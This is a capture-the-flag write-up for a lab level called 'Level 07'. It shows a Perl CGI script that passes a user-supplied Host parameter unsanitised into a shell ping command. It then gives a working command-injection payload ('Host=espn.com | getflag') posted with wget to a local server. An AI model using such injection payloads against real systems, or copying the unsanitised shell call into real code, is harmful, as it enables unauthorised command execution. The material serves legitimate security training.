Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
41 lines (26 sloc) 1.32 KB

###Level 07 ####Introduction This exploit features the below perl script which is hosting a web server

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

####Exploit I don't really know Perl, but it looks like this is going to be similar to a SQL injection attack.
ping -c 3 $host 2>&1 is being called with the host variable which is passed in as an argument to this code. You can then pass in the host parameter to be something like www.espn.com | getflag which when called will run ping with espn.com and then also execute the getflag command.

I tried running perl index.cgi Host="espn.com | getflag" in the directory /home/flag07 but that code still runs as my user so it fails. However, if you post this paramater to the web server that is running it will run as the user hosting the web server.

The config file for this web server shows the server running on port 7007. So we can use the wget utility to post to this web server wget localhost:7007/index.cgi --post-data="Host=espn.com | getflag"